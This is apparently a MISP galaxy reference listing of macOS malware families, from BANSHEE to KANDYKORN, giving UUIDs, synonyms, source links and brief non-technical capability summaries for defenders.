- https://objective-see.com/blog/blog_0x5F.html - webarchive
- https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/ - webarchive
- https://objective-see.com/blog/blog_0x49.html - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://brandefense.io/blog/apt-groups/lazarus-apt-group-apt38/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a - webarchive
- https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b - webarchive
- https://www.youtube.com/watch?v=rjA0Vf75cYk - webarchive
- https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56 - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
- https://www.youtube.com/watch?v=1NkzTKkEM2k - webarchive
- https://securelist.com/operation-applejeus-sequel/95596/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g - webarchive
- https://objective-see.com/blog/blog_0x54.html - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment - webarchive
- https://securelist.com/operation-applejeus/87553/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BANSHEE
Internal MISP references
UUID 5d7b9bcf-a0b6-47eb-8350-a80fac356567 which can be used as unique global reference for BANSHEE in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.banshee - webarchive
- https://www.elastic.co/security-labs/beyond-the-wail?ultron=esl:_threat_research%2Besl_blog_post&blade=twitter&hulk=social&utm_content=14389248623&linkId=549532028 - webarchive
- https://securityaffairs.com/171423/malware/the-source-code-of-banshee-stealer-leaked-online.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BeaverTail (OS X)
Internal MISP references
UUID 61ec34d7-6c40-4900-9a79-f16b2eec213e which can be used as unique global reference for BeaverTail (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.beavertail - webarchive
- https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/ - webarchive
- https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/ - webarchive
- https://www.nimanthadeshappriya.com/post/from-colombo-to-pyongyang - webarchive
- https://objective-see.org/blog/blog_0x7A.html - webarchive
- https://www.group-ib.com/blog/apt-lazarus-python-scripts/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Bella
Internal MISP references
UUID 3c5036ad-2afc-4bc1-a5a3-b31797f46248 which can be used as unique global reference for Bella in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Bundlore
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bundlore.
| Known Synonyms |
|---|
| SurfBuyer |
Internal MISP references
UUID 5f5f5496-d9f8-4984-aa66-8702741646fe which can be used as unique global reference for Bundlore in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore - webarchive
- https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20 - webarchive
- https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/ - webarchive
- https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore--leaves-it-unused.html - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Careto (OS X)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Careto (OS X).
| Known Synonyms |
|---|
| Appetite |
| Mask |
Internal MISP references
UUID dcabea75-a433-4157-bb7a-be76de3026ac which can be used as unique global reference for Careto (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Casso
Internal MISP references
UUID 387e1a19-458d-4961-a8e4-3f82463085e5 which can be used as unique global reference for Casso in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CDDS
Google TAG has observed this malware being delivered via watering hole attacks using 0-day exploits, targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CDDS.
| Known Synonyms |
|---|
| Macma |
Internal MISP references
UUID 5e4bdac7-b6c8-4c59-996f-babfc3bb3a3c which can be used as unique global reference for CDDS in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.cdds - webarchive
- https://objective-see.com/blog/blog_0x69.html - webarchive
- https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/ - webarchive
- https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/ - webarchive
- https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Choziosi (OS X)
A loader delivering malicious Chrome and Safari extensions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Choziosi (OS X).
| Known Synonyms |
|---|
| ChromeLoader |
| Chropex |
Internal MISP references
UUID 57f75f24-b77b-46b3-a06a-57d49374fb82 which can be used as unique global reference for Choziosi (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.choziosi - webarchive
- https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension - webarchive
- https://www.th3protocol.com/2022/Choziosi-Loader - webarchive
- https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER - webarchive
- https://redcanary.com/blog/chromeloader/ - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-uncovered-a-new-macos-browser-hijacking-campaign/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CloudMensis
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CloudMensis.
| Known Synonyms |
|---|
| BadRAT |
Internal MISP references
UUID 557fc183-f51a-4740-b2dd-5e81e6f6690a which can be used as unique global reference for CloudMensis in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CoinThief
CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component.
It was spreading in early 2014 from several different sources:
- on Github (where the trojanized compiled binary didn't match the displayed source code),
- on popular and trusted download sites like CNET's Download.com or MacUpdate.com, and
- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.
The patcher's role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted Bitcoin-Qt versions 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt by adding malicious code that would send nearly all the victim's Bitcoins to one of the hard-coded addresses belonging to the attacker.
The browser extensions targeted Chrome and Firefox and were disguised as a "Pop-up blocker". The extensions monitored visited websites, downloaded malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker's address or simply harvest login credentials for the targeted online service.
The backdoor enabled the attacker to take full control over the victim's computer:
- collect information about the infected computer
- execute arbitrary shell scripts on the target computer
- upload an arbitrary file from the victim's hard drive to a remote server
- update itself to a newer version
Internal MISP references
UUID 70e73da7-21d3-4bd6-9a0e-0c904e6457e8 which can be used as unique global reference for CoinThief in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Coldroot RAT
Internal MISP references
UUID 076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf which can be used as unique global reference for Coldroot RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Convuster
Internal MISP references
UUID 3819ded3-27ac-4e2f-9cd6-c6ef1642599b which can be used as unique global reference for Convuster in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CpuMeaner
Internal MISP references
UUID 74360d1e-8f85-44d1-8ce7-e76afb652142 which can be used as unique global reference for CpuMeaner in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CreativeUpdater
Internal MISP references
UUID 40fc6f71-75ac-43ac-abd9-c90b0e847999 which can be used as unique global reference for CreativeUpdater in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater - webarchive
- https://digitasecurity.com/blog/2018/02/05/creativeupdater/ - webarchive
- https://objective-see.com/blog/blog_0x29.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Crisis
Internal MISP references
UUID 2bb6c494-8057-4d83-9202-fda3284deee4 which can be used as unique global reference for Crisis in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis - webarchive
- https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines - webarchive
- https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/? - webarchive
- http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Crossrider
Internal MISP references
UUID 05ddb459-5a2f-44d5-a135-ed3f1e772302 which can be used as unique global reference for Crossrider in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Cthulhu Stealer
Internal MISP references
UUID 549f4c7c-55e3-478e-a84e-e27c5e195c97 which can be used as unique global reference for Cthulhu Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dacls (OS X)
According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.
Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.
Internal MISP references
UUID 81def650-f52e-49a3-a3fe-cb53ffa75d67 which can be used as unique global reference for Dacls (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls - webarchive
- https://objective-see.com/blog/blog_0x5F.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/ - webarchive
- https://objective-see.com/blog/blog_0x57.html - webarchive
- https://www.sygnia.co/mata-framework - webarchive
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability - webarchive
- https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/ - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DarthMiner
Internal MISP references
UUID a8e71805-014d-4998-b21e-3125da800124 which can be used as unique global reference for DarthMiner in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DazzleSpy
Internal MISP references
UUID ba2c7d3c-7f7a-42f7-854c-a6cc0b5eb850 which can be used as unique global reference for DazzleSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dockster
Internal MISP references
UUID 713d8ec4-4983-4fbb-827c-2ef5bc0e6930 which can be used as unique global reference for Dockster in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Dummy
Internal MISP references
UUID cbf9ff89-d35b-4954-8873-32f59f5e4d7d which can be used as unique global reference for Dummy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EggShell RAT
Internal MISP references
UUID ab733576-67ad-4cf9-8d11-afecac3f9a6e which can be used as unique global reference for EggShell RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Eleanor
Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses the Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.
The Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via a Tor-generated address.
The Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.
The web service is the main malicious component that provides the attackers with control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:
- Managing files
- Listing processes
- Connecting to various database management systems such as MySQL or SQLite
- Connecting via bind/reverse shell
- Executing shell commands
- Capturing and browsing images and videos from the victim’s webcam
- Sending emails with an attachment
Internal MISP references
UUID c221e519-fe3e-416e-bc63-a2246b860958 which can be used as unique global reference for Eleanor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ElectroRAT
According to PCrisk, ElectroRAT is a Remote Access Trojan (RAT) written in the Go programming language and designed to target Windows, MacOS, and Linux users. Cyber criminals behind ElectroRAT target mainly cryptocurrency users. This RAT is distributed via the trojanized Jamm, eTrader, and DaoPoker applications.
Internal MISP references
UUID f8ccf928-7d4f-4999-91a5-9222f148152d which can be used as unique global reference for ElectroRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat - webarchive
- https://objective-see.com/blog/blog_0x61.html - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EvilOSX
Internal MISP references
UUID 24f3d8e1-3936-4664-b813-74c797b87d9d which can be used as unique global reference for EvilOSX in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
EvilQuest
According to PcRisk, EvilQuest (also known as ThiefQuest) is like many other malicious programs of this type - it encrypts files and creates a ransom message. In most cases, this type of malware modifies the names of encrypted files by appending certain extensions, however, this ransomware leaves them unchanged.
It drops the "READ_ME_NOW.txt" in each folder that contains encrypted data and displays another ransom message in a pop-up window. Additionally, this malware is capable of detecting if certain files are stored on the computer, operates as a keylogger, and receives commands from a Command & Control server.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EvilQuest.
| Known Synonyms |
|---|
| ThiefQuest |
Internal MISP references
UUID d5b39223-a8cc-4d47-8030-1d7d6312d351 which can be used as unique global reference for EvilQuest in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest - webarchive
- https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/ - webarchive
- https://objective-see.com/blog/blog_0x5F.html - webarchive
- https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/ - webarchive
- https://twitter.com/dineshdina04/status/1277668001538433025 - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities - webarchive
- https://github.com/gdbinit/evilquest_deobfuscator - webarchive
- https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/ - webarchive
- https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/ - webarchive
- https://objective-see.com/blog/blog_0x59.html - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FailyTale
Internal MISP references
UUID 5dfd704c-a69d-4e93-bd70-68f89fbbb32c which can be used as unique global reference for FailyTale in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FinFisher (OS X)
Internal MISP references
UUID 89ce536c-03b9-4f69-83ce-723f26b36494 which can be used as unique global reference for FinFisher (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher - webarchive
- https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/ - webarchive
- https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/ - webarchive
- https://objective-see.com/blog/blog_0x5F.html - webarchive
- https://objective-see.com/blog/blog_0x4F.html - webarchive
- https://securelist.com/finspy-unseen-findings/104322/ - webarchive
- https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FlashBack
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlashBack.
| Known Synonyms |
|---|
| FakeFlash |
Internal MISP references
UUID f92b5355-f398-4f09-8bcc-e06df6fe51a0 which can be used as unique global reference for FlashBack in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback - webarchive
- https://en.wikipedia.org/wiki/Flashback_(Trojan) - webarchive
- https://news.drweb.com/show/?c=5&i=2386&lng=en - webarchive
- https://web-assets.esetstatic.com/wls/200x/white-papers/osx_flashback.pdf - webarchive
- http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html - webarchive
- http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities - webarchive
- https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FlexibleFerret
Internal MISP references
UUID b4461d8d-f41b-4195-a36c-45cd24409f6a which can be used as unique global reference for FlexibleFerret in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FriendlyFerret
Internal MISP references
UUID 55d9ec38-aba4-4049-a98e-0f3289b17477 which can be used as unique global reference for FriendlyFerret in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FrigidStealer
According to Proofpoint, FrigidStealer uses AppleScript files and osascript to prompt the user to enter their password, and then to gather data including browser cookies, files with extensions relevant to password material or cryptocurrency from the victim’s Desktop and Documents folders, and any Apple Notes the user has created.
Internal MISP references
UUID 0656f9e1-9606-42b4-9198-114d55e05a17 which can be used as unique global reference for FrigidStealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FrostyFerret
Internal MISP references
UUID 3f8caa3d-63ed-4140-b8b1-d290936730da which can be used as unique global reference for FrostyFerret in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.frostyferret - webarchive
- https://www.trendmicro.com/en_us/research/25/d/russian-infrastructure-north-korean-cybercrime.html - webarchive
- https://www.silentpush.com/blog/contagious-interview-front-companies/ - webarchive
- https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/ - webarchive
- https://www.sentinelone.com/blog/macos-flexibleferret-further-variants-of-dprk-malware-family-unearthed/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FruitFly
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FruitFly.
| Known Synonyms |
|---|
| Quimitchin |
Internal MISP references
UUID a517cdd1-6c82-4b29-bdd2-87e281227597 which can be used as unique global reference for FruitFly in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ - webarchive
- https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html - webarchive
- https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/ - webarchive
- https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/ - webarchive
- https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/ - webarchive
- https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FULLHOUSE
Fullhouse (AKA FULLHOUSE.DOORED) is a custom backdoor used by subsets of the North Korean Lazarus Group. Fullhouse is written in C/C++ and includes the capabilities of a tunneler and backdoor command support such as shell command execution, file transfer, file management, and process injection. C2 communications occur via HTTP and require configuration through the command line or a configuration file.
Internal MISP references
UUID 2ab781d8-214d-41e2-acc9-23ded4f77663 which can be used as unique global reference for FULLHOUSE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GIMMICK (OS X)
This multi-platform malware has an Objective-C macOS variant dubbed GIMMICK by Volexity. This malware is a file-based C2 implant used by Storm Cloud.
Internal MISP references
UUID 0e259d0f-717a-4ced-ac58-6fe9d72e2c96 which can be used as unique global reference for GIMMICK (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Gmera
According to PCrisk, GMERA (also known as Kassi trojan) is malicious software that disguises itself as Stockfolio, a legitimate trading app created for Mac users.
Research shows that there are two variants of this malware, one detected as Trojan.MacOS.GMERA.A and the other as Trojan.MacOS.GMERA.B. Cyber criminals proliferate GMERA to steal various information and upload it to a website under their control. To avoid damage caused by this malware, remove GMERA immediately.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gmera.
| Known Synonyms |
|---|
| Kassi |
| StockSteal |
Internal MISP references
UUID 1c65cf4e-5df4-4d56-a414-7b05f00814ba which can be used as unique global reference for Gmera in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/ - webarchive
- https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/ - webarchive
- https://objective-see.com/blog/blog_0x53.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GolangGhost (OS X)
Internal MISP references
UUID 1f8b4aac-fc57-4f66-8b03-bbf279f417e9 which can be used as unique global reference for GolangGhost (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.golangghost - webarchive
- https://blog.talosintelligence.com/python-version-of-golangghost-rat/ - webarchive
- https://www.trendmicro.com/en_us/research/25/d/russian-infrastructure-north-korean-cybercrime.html - webarchive
- https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/ - webarchive
- https://blog.polyswarm.io/famous-chollimas-pylangghost - webarchive
- https://hackernoon.com/cybercrooks-are-using-fake-job-listings-to-steal-crypto - webarchive
- https://www.silentpush.com/blog/contagious-interview-front-companies/ - webarchive
- https://www-cdn.anthropic.com/b2a76c6f6992465c09a6f2fce282f6c0cea8c200.pdf - webarchive
- https://www.wiz.io/blog/north-korean-tradertraitor-crypto-heist - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HiddenLotus
According to Malwarebytes, the HiddenLotus "dropper" is an application named Lê Thu Hà (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.
Internal MISP references
UUID fc17e41f-e9f7-4442-a05c-7a19b9174c39 which can be used as unique global reference for HiddenLotus in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HLOADER
Internal MISP references
UUID 28304d68-689e-4488-80cb-d5b7b50a8d57 which can be used as unique global reference for HLOADER in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.hloader - webarchive
- https://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/ - webarchive
- https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2024/papers/Sugarcoating-KANDYKORN-a-sweet-dive-into-a-sophisticated-MacOS-backdoor.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HZ RAT (OS X)
Internal MISP references
UUID 37f37678-c8c3-44d7-82bd-ecb452fba012 which can be used as unique global reference for HZ RAT (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
iMuler
The threat was a multi-stage malware displaying a decoy that appeared to the victim as a Chinese language article on the long-running dispute over the Diaoyu Islands; an array of erotic pictures; or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and Imuler was the backdoor capable of the following operations:
- capture screenshots
- exfiltrate files to a remote computer
- send various information about the infected computer
- extract ZIP archive
- download files from a remote computer and/or the Internet
- run executable files
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular iMuler.
| Known Synonyms |
|---|
| Revir |
Internal MISP references
UUID 261fd543-60e4-470f-af28-7a9b17ba4759 which can be used as unique global reference for iMuler in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler - webarchive
- http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html - webarchive
- https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/ - webarchive
- https://www.welivesecurity.com/2012/03/16/osximuler-updated-still-a-threat-on-mac-os-x/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Interception (OS X)
Internal MISP references
UUID d4f7ea92-04e7-405c-9faf-7993ffd5c473 which can be used as unique global reference for Interception (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.interception - webarchive
- https://twitter.com/ESETresearch/status/1559553324998955010 - webarchive
- https://labs.k7computing.com/index.php/lazarus-apts-operation-interception-uses-signed-binary/ - webarchive
- https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Janicab (OS X)
According to Patrick Wardle, this malware persists a python script as a cron job. Steps:
1. The Python installer first saves any existing cron jobs into a temporary file named '/tmp/dump'.
2. It appends its new job to this file.
3. Once the new cron job has been added, 'python (~/.t/runner.pyc)' runs every minute.
Internal MISP references
UUID 01325d85-297f-40d5-b829-df9bd996af5a which can be used as unique global reference for Janicab (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab - webarchive
- https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://securelist.com/deathstalker-mercenary-triumvirate/98177/ - webarchive
- https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/ - webarchive
- https://www.malwarology.com/posts/5-janicab-part_1/ - webarchive
- https://archive.f-secure.com/weblog/archives/00002576.html - webarchive
- https://www.malwarology.com/2022/05/janicab-series-attibution-and-iocs/ - webarchive
- https://www.malwarology.com/2022/05/janicab-series-further-steps-in-the-infection-chain/ - webarchive
- https://www.malwarology.com/2022/05/janicab-series-first-steps-in-the-infection-chain/ - webarchive
- https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/ - webarchive
- https://www.macmark.de/blog/osx_blog_2013-08-a.php - webarchive
- https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
JokerSpy
Internal MISP references
UUID 171b0695-8cea-4ca6-a3f0-c9a8455ef9de which can be used as unique global reference for JokerSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KANDYKORN
Internal MISP references
UUID d314856b-1c07-4f4a-ab3e-eeae38536857 which can be used as unique global reference for KANDYKORN in MISP communities and other software using the MISP galaxy
External references
